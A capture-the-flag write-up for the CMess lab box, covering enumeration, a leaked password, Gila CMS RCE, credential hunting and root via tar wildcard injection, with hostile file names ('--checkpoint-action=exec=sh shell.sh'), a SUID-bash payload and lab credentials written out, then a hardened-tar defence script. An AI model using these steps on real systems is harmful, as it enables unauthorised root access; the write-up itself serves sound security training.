![[Pasted image 20250629160549.png]]

---

# Set up

Add `10.10.36.191 cmess.thm` to `/etc/hosts`:

```bash
echo "10.10.36.191 cmess.thm" | sudo tee -a /etc/hosts
```

# Information Gathering

An Nmap TCP scan against all 65,535 ports found 2 open ports: 22 and 80.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ sudo nmap -sS $IP -Pn -n --open --min-rate 3000 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-29 13:45 CDT
Nmap scan report for 10.10.36.191
Host is up (0.51s latency).
Not shown: 56958 closed tcp ports (reset), 8575 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 27.12 seconds
```

A more detailed TCP scan against the 2 ports found:

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sC -sV $IP -p 22,80
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-29 13:46 CDT
Nmap scan report for cmess.thm (10.10.36.191)
Host is up (0.13s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 d9:b6:52:d3:93:9a:38:50:b4:23:3b:fd:21:0c:05:1f (RSA)
|   256 21:c3:6e:31:8b:85:22:8a:6d:72:86:8f:ae:64:66:2b (ECDSA)
|_  256 5b:b9:75:78:05:d7:ec:43:30:96:17:ff:c6:a8:6c:ed (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Gila CMS
| http-robots.txt: 3 disallowed entries
|_/src/ /themes/ /lib/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.81 seconds
```

A UDP scan against the top 1,000 ports found nothing open:

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sU $IP --min-rate 3000 --top-ports 1000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-29 13:49 CDT
Nmap scan report for cmess.thm (10.10.36.191)
Host is up (0.14s latency).
Not shown: 994 open|filtered udp ports (no-response)
PORT      STATE  SERVICE
965/udp   closed unknown
5555/udp  closed rplay
7938/udp  closed unknown
20206/udp closed unknown
20742/udp closed unknown
36489/udp closed unknown

Nmap done: 1 IP address (1 host up) scanned in 1.24 seconds
```

---

# Footprinting

##### Port 80

Navigating to `10.10.36.191` in the browser reveals the name of the CMS in use: Gila.

![[Pasted image 20250629135238.png]]

`/robots.txt` lists 3 directories worth exploring: `src`, `themes`, and `lib`.

![[Pasted image 20250629135309.png]]

I used `gobuster` to enumerate directories, and judging by their names, some of them could be useful.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.36.191
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index                (Status: 200) [Size: 3860]
/search               (Status: 200) [Size: 3860]
/about                (Status: 200) [Size: 3359]
/blog                 (Status: 200) [Size: 3860]
/1                    (Status: 200) [Size: 4090]
/01                   (Status: 200) [Size: 4090]
/login                (Status: 200) [Size: 1583]
/category             (Status: 200) [Size: 3871]
/0                    (Status: 200) [Size: 3860]
/themes               (Status: 301) [Size: 324] [--> http://10.10.36.191/themes/?url=themes]
/feed                 (Status: 200) [Size: 735]
/admin                (Status: 200) [Size: 1583]
/assets               (Status: 301) [Size: 324] [--> http://10.10.36.191/assets/?url=assets]
/tag                  (Status: 200) [Size: 3883]
/author               (Status: 200) [Size: 3599]
/Search               (Status: 200) [Size: 3860]
/sites                (Status: 301) [Size: 322] [--> http://10.10.36.191/sites/?url=sites]
/About                (Status: 200) [Size: 3345]
/log                  (Status: 301) [Size: 318] [--> http://10.10.36.191/log/?url=log]
/Index                (Status: 200) [Size: 3860]
/tags                 (Status: 200) [Size: 3145]
/1x1                  (Status: 200) [Size: 4090]
/lib                  (Status: 301) [Size: 318] [--> http://10.10.36.191/lib/?url=lib]
/src                  (Status: 301) [Size: 318] [--> http://10.10.36.191/src/?url=src]
/api                  (Status: 200) [Size: 0]
/001                  (Status: 200) [Size: 4090]
/cm                   (Status: 500) [Size: 0]
/1pix                 (Status: 200) [Size: 4090]
/fm                   (Status: 200) [Size: 0]
/tmp                  (Status: 301) [Size: 318] [--> http://10.10.36.191/tmp/?url=tmp]
/1a                   (Status: 200) [Size: 4090]
/0001                 (Status: 200) [Size: 4090]
/1x1transparent       (Status: 200) [Size: 4090]
/INDEX                (Status: 200) [Size: 3860]
/1px                  (Status: 200) [Size: 4090]
```

`/login` has a login form, but I haven't found any credentials yet.

![[Pasted image 20250629140310.png]]

Because I felt that I hadn't gathered enough information, I tried enumerating virtual hosts and subdomains on the server.

![[Pasted image 20250629144226.png]]

Added `dev.cmess.thm` to `/etc/hosts`:

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ echo "10.10.36.191 dev.cmess.thm" | sudo tee -a /etc/hosts
[sudo] password for parallels:
10.10.36.191 dev.cmess.thm
```

`dev.cmess.thm` reveals what appears to be a chat history between andre and support, and it exposes andre's new password.
![[Pasted image 20250629144623.png]]

andre's new password from the chat: `KPFTN_f2yxe%`

# Exploit - Gaining Initial Access

I was able to log in as `[email protected]`, and at the very bottom of the page it reveals the Gila CMS version: `1.10.9`.

![[Pasted image 20250629144919.png]]

I searched for `gila cms` on Searchsploit, and there was a known RCE vulnerability in version 1.10.9.

![[Pasted image 20250629150013.png]]

![[Pasted image 20250629150627.png]]

# Lateral Movement

`config.php` in `/var/www/html` contains a set of database credentials that we could try against the local database.

```php
<?php
$GLOBALS['config'] = array (
  'db' => array (
    'host' => 'localhost',
    'user' => 'root',
    'pass' => 'r0otus3rpassw0rd',
    'name' => 'gila',
  ),
  'permissions' => array (
    1 => array (
      0 => 'admin',
      1 => 'admin_user',
      2 => 'admin_userrole',
    ),
  ),
  'packages' => array (
    0 => 'blog',
  ),
  'base' => 'http://cmess.thm/gila/',
  'theme' => 'gila-blog',
  'title' => 'Gila CMS',
  'slogan' => 'An awesome website!',
  'default-controller' => 'blog',
  'timezone' => 'America/Mexico_City',
  'ssl' => '',
  'env' => 'pro',
  'check4updates' => 1,
  'language' => 'en',
  'admin_email' => '[email protected]',
  'rewrite' => true,
);
```

`/etc/passwd` shows a `mysql` service account, which strongly suggests MySQL is the database running on the server, so the credentials we just found can probably be used to log into it.
```bash
www-data@cmess:/var/www/html$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
andre:x:1000:1000:andre,,,:/home/andre:/bin/bash
mysql:x:108:117:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin
www-data@cmess:/var/www/html$
```

I put my theory to the test, and it actually worked!

```bash
www-data@cmess:/var/www/html$ mysql -u root -p'r0otus3rpassw0rd'
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 258897
Server version: 5.7.29-0ubuntu0.16.04.1 (Ubuntu)

Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>
```

I enumerated databases and tables; the table named `user` stood out to me.

```bash
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| gila               |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0.01 sec)

mysql> use gila;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+----------------+
| Tables_in_gila |
+----------------+
| option         |
| page           |
| post           |
| postcategory   |
| postmeta       |
| user           |
| usermeta       |
| userrole       |
| widget         |
+----------------+
9 rows in set (0.00 sec)
```

The `user` table contained only one user, `andre`, with his username, email and hashed password.

![[Pasted image 20250629151921.png]]

`hashes.com` confirmed the hash type to be `bcrypt`.

![[Pasted image 20250629152202.png]]

I tried cracking the hash using both `John` and `Hashcat`, but the process was taking too long. Had the hash been MD5, it would have cracked quickly; since it was bcrypt, I couldn't afford to sit and rely solely on hash-cracking tools.
```bash
Session..........: hashcat
Status...........: Running
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2y$10$uNAA0MEze02jd.qU9tnYLu43bNo9nujltElcWEAcifNe...4bEsBa
Time.Started.....: Sun Jun 29 15:28:28 2025 (34 secs)
Time.Estimated...: Wed Jul  2 02:49:54 2025 (2 days, 11 hours)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:       67 H/s (8.11ms) @ Accel:4 Loops:32 Thr:1 Vec:1
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 2256/14344385 (0.02%)
Rejected.........: 0/2256 (0.00%)
Restore.Point....: 2256/14344385 (0.02%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:384-416
Candidate.Engine.: Device Generator
Candidates.#1....: poncho -> sprite
Hardware.Mon.#1..: Util:  0%

[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit =>
```

In the `/opt` directory, I found a hidden backup file containing Andre's backup password.

```bash
www-data@cmess:/opt$ ls -la
total 12
drwxr-xr-x  2 root root 4096 Feb  6  2020 .
drwxr-xr-x 22 root root 4096 Feb  6  2020 ..
-rwxrwxrwx  1 root root   36 Feb  6  2020 .password.bak
www-data@cmess:/opt$ cat .password.bak
andres backup password
UQfsdCB7aAP6
```

I'm now logged in as `andre`:

```bash
www-data@cmess:/opt$ su andre
Password:
andre@cmess:/opt$ whoami
andre
```

Got the `user.txt` flag:

```bash
andre@cmess:~$ cat user.txt
thm{c52...
```

# Privilege Escalation

In the `/home/andre/backup` directory there was a file named `note`, which tells us that everything in that directory will be backed up. This strongly suggests that some scheduled task performs the backup at a fixed interval.

```bash
andre@cmess:~/backup$ ls
note
andre@cmess:~/backup$ cat note
Note to self. Anything in here will be backed up!
```

Therefore, I checked `/etc/crontab`, and as expected, there was a cron job scheduled to run every 2 minutes.
The job changes directory to `/home/andre/backup` and runs `tar -zcf /tmp/andre_backup.tar.gz *`. The wildcard (`*`) is expanded by the shell before `tar` starts, so every file name in `/home/andre/backup` becomes a separate command-line argument to `tar`, which runs as root.

```bash
andre@cmess:~/backup$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/2 *   * * *   root    cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *
```

`tar` has an option called `--checkpoint-action` that executes a command during the archiving process. By creating files whose names start with `--checkpoint` and `--checkpoint-action`, those names are parsed by `tar` as options rather than as files to archive, so `tar` can be tricked into running a script. `shell.sh` contains a command that sets the SUID bit on `/bin/bash`; when the root cron job runs `tar` with those file names as arguments, `tar` executes `shell.sh` as root.

```bash
cd /home/andre/backup
echo 'chmod +s /bin/bash' > shell.sh
chmod +x shell.sh
```

Create files named `--checkpoint=1` and `--checkpoint-action=exec=sh shell.sh`:
```bash
andre@cmess:~/backup$ touch -- '--checkpoint=1'
andre@cmess:~/backup$ touch -- '--checkpoint-action=exec=sh shell.sh'
andre@cmess:~/backup$ ls
--checkpoint=1  --checkpoint-action=exec=sh shell.sh  note  shell.sh
```

After 2 minutes, I checked the file permissions of `/bin/bash`, and it now has the SUID bit set!

```bash
andre@cmess:~/backup$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1037528 May 16  2017 /bin/bash
```

Run the binary with `-p` and gain a root shell!

```bash
andre@cmess:~/backup$ /bin/bash -p
bash-4.3# whoami
root
bash-4.3#
```

Found the `root.txt` flag :)

```bash
bash-4.3# cd /root
bash-4.3# ls
root.txt
bash-4.3# cat root.txt
thm{9f8...
```
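The root cause of the privilege escalation above is the shell expanding `*` into arguments that `tar` then parses as options. The script below is an added example, not part of the original writeup: it shows the hardened form of the same cron job (`-C DIR .` instead of `*`), proves with constructed hostile file names in a scratch directory that they are archived as data and never executed, and includes a quick check for the same `tar ... *` pattern in a system crontab (the `flag_glob_tar_jobs` helper and the scratch paths are constructed for this demonstration).

```bash
#!/bin/sh
# Added example (not from the writeup): hardened replacement for
#   cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *
# The shell expands `*` into one argument per file, so a file literally
# named `--checkpoint=1` arrives in argv and tar treats it as an option.
# With `-C DIR .` the only member argument is the literal `.`; tar discovers
# the file names itself while reading the directory, and names read from
# disk are never parsed as options.

safe_backup() {
    src=$1
    dest=$2
    tar -zcf "$dest" -C "$src" .
}

# Number of members in the archive, excluding the top-level `./` entry.
archived_entries() {
    tar -tzf "$1" | grep -Ecv '^\./?$'
}

# Print system-crontab lines where root runs tar on a bare `*` glob.
# Exit status is 0 if at least one such job was found.
flag_glob_tar_jobs() {
    grep -E '^[^#].*[[:space:]]root[[:space:]].*[[:space:]]tar[[:space:]].*[[:space:]]\*([[:space:]]|$)' "$1"
}

# Demonstration with constructed hostile file names in a scratch directory.
# canary.sh would create CANARY_RAN if tar ever executed it.
demo() {
    work=$(mktemp -d)
    mkdir "$work/backup"
    printf 'touch "%s"\n' "$work/CANARY_RAN" > "$work/backup/canary.sh"
    : > "$work/backup/--checkpoint=1"
    : > "$work/backup/--checkpoint-action=exec=sh canary.sh"
    safe_backup "$work/backup" "$work/out.tar.gz"
    ran=0
    [ -e "$work/CANARY_RAN" ] && ran=1
    n=$(archived_entries "$work/out.tar.gz")
    rm -rf "$work"
    echo "archived $n entries; canary executed: $ran"
    [ "$ran" -eq 0 ] && [ "$n" -eq 3 ]
}
```

Pointing `flag_glob_tar_jobs` at `/etc/crontab` on the box flags the `*/2` job and nothing else, and `demo` exits 0 only when all three hostile names end up inside the archive without the canary running.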